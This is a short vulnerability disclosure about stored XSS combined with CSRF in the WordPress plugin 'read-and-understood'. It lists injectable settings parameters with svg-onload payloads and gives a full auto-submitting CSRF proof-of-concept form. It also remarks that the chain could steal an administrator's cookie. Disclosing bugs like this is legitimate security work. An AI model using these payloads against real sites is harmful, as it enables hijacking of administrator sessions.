Well ,sir ,I just found some Stored-XSS bugs and a CSRF bug at wp-plugin read-and-understood.
When the admin user click the "Save changes" button in the read-and-understood setting page, we'll post some data to:
http://127.0.0.1/wordpress/wp-admin/options-general.php?page=read-and-understood-menu-slug-01
But when I pentest the parameter in this plugin, I found when I write something into this point, it does not filter well.
Weak data parameters:
1.rnu_username_validation_title=at+least+one+but+no+more+than+10+capital+letters'"><svg/onload=console.log(/xss/)><'"
2.rnu_username_validation_pattern=%5BA-Z%5D%7B1%2C10%7D'"><svg/onload=console.log(/xss2/)><'"
Well, the stored-xss bugs here need to combined with a csrf bug. Because no csrf protection here, we can cheat the admin user to visit the evil html on the evil site.
POC:
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://127.0.0.1/wordpress/wp-admin/options-general.php?page=read-and-understood-menu-slug-01" method="POST">
<input type="hidden" name="rnu_username_validation_pattern" value="[A-Z]{1,10}'"><svg/onload=console.log(/xss2/)><'"" />
<input type="hidden" name="rnu_username_validation_title" value="at least one but no more than 10 capital letters'"><svg/onload=console.log(/xss/)><'"" />
<input type="hidden" name="rnu_username" value="" />
<input type="hidden" name="Submit" value="Save Changes" />
<input type="hidden" name="submit_hidden" value="Y" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
In a word, if the manager could be cheated to visit my evil html on my site, I can get the manager's cookie easily, or do something more evilly.
Well, by the way, I just test the bug in the wordpress 4.9.1 and the latest version of the wp-plugin read-and-understood.
